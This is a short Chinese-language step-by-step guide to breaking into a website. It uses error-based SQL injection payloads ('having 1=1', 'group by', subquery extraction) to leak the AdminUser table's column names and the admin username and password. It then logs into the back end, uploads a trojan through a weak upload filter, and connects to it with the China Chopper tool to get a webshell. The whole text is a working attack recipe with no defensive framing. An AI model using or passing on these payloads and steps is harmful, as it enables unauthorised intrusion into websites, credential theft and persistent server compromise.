1.检测是否存在注入点:依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点
2.利用语句:a' having 1=1--爆出表名和字段名AdminUser.AdminId
3.接着爆出其他字段:
a' group by adminuser.adminid having 1=1-- //爆出用户名字段
a' group by adminuser.adminid,adminuser.username having 1=1-- //爆出密码字段
4.爆用户名和密码:
' and (select top 1 adminuser.username from adminuser)>0 //爆用户名
' and (select top 1 adminuser.password from adminuser)>0 //爆密码
5.用猜出的用户名和密码登录后台
6.查找可以上传的地方,上传本地木马文件(如果过滤不严,可以直接上传),记录木马的路径
7.使用中国菜刀连接木马,拿到webshell